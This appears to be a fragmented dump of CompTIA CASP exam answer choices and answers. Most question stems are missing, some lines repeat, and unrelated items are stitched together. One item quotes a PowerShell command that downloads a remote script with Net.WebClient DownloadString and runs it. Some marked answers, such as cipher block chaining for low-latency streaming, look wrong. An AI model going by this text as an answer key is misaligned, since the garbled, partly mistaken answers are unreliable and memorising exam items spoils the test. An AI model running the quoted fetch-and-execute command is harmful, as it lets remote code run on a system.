B. Set the devices to enforcing
A. a decrypting RSA using obsolete and weakened encryption attack
C. A CDN with the origin set to its datacenter
B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management
C. Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash
D. Isolate the management interface to the private VLAN where a legacy browser in a VM can be used as needed to manage the system.
D. Isolate the management interface to the private VLAN where a legacy browser in a VM can be used as needed to manage the system.
C. A self-healing system
D. A honeypot
B. CASB
B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.
D. A CRM application to consolidate the data and provision access based on the process and need
B. Management plane breach
B. In memory during processing
D. Autoscaling endpoints
E. Rate limiting
powershell “))(New-Object Net.WebClient).DownloadString (https://content.comptia.org/casp/whois.ps1);whois”
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse-proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
D. Forward proxy and MFA
A. Securely configure the authentication mechanisms
C. HIDS
D. Dynamic analysis
*Low latency
*Suitable for streaming
Which of the following ciphers should the company use?
A. Cipher feedback
B. Cipher block chaining message authentication code
C. Cipher block chaining
D. Electronic codebook
C. Cipher block chaining
B. The disk utilization alarms are higher than what the service restarts require
D. Differential timing analysis
A. Differential power analysis
C. Input validation